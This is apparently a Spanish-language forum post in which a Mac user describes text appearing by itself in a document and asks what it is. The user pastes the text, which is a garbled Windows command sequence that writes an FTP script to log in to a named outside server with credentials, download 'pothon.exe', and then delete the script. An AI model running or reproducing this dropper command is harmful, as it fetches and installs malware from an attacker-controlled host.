Buenas.
Bueno pues a ver. Tengo un iMac con Mac OS X lógicamente. Como muchos sabréis, la seguridad en Mac es alta y apenas hay virus, por no decir que no hay ninguno.
El caso es que ayer estaba escribiendo un artículo en el ordenador y de repente veo que empieza a escribirse texto de forma automática. Vamos, como si alguien estuviera tecleando en mi documento.
Al principio flipé, pensando que algún vecino había conectado su teclado a mi Mac por Bluetooth o algo, pero me hubiera salido una ventana de confirmación, entonces eso no puede ser.
No le di mucha importancia así que borré lo que había escrito X persona y seguí con mi trabajo. Lo que pasa es que luego volvió a suceder, 2 veces más.
Mirando lo que ha escrito, me parece algo sospechoso la verdad. Según entiendo por lo que pone, intenta acceder por FTP a un servidor y descargarse un tal pothon.exe, y luego deja algún mensaje de "bye" (no entiendo mucho de esto).
Os quería dejar el texto por si alguien tiene la más remota idea de lo que puede ser y de donde sale esto.
cmd -c echo open
http://www.safkar.ro 21 .. ik 7echo user ftpsafkar 5afguz .. ik 7echo binary .. ik 7echo get pothon.exe .. ik 7echo bye .. ik 7ftp 'n 'v 'sñik 7del ik 7pothon.exe 7exit
La verdad es que me da paranoia pensar que alguien podría estar accediendo a mi ordenador o algo parecido, no se. :S
¿Alguien podría darme alguna pista sobre lo que es eso?
Gracias por vuestra ayuda.
Edit: Acabo de acordarme. Podría tener algo que ver el hecho de que me conecte a internet desde una red WiFi abierta? Ya que el cable del router no llega a mi cuarto, entonces me conecto a un punto de acceso que hay por ahí. xD